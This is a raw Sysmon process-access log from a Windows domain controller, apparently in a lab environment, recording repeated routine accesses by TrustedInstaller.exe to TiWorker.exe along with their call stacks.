10341000x80000000000000006066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.870{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.870{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.870{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.870{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.854{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.854{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.854{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.854{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.854{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.838{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.838{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.838{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.823{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.823{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.823{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.807{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.792{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.792{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 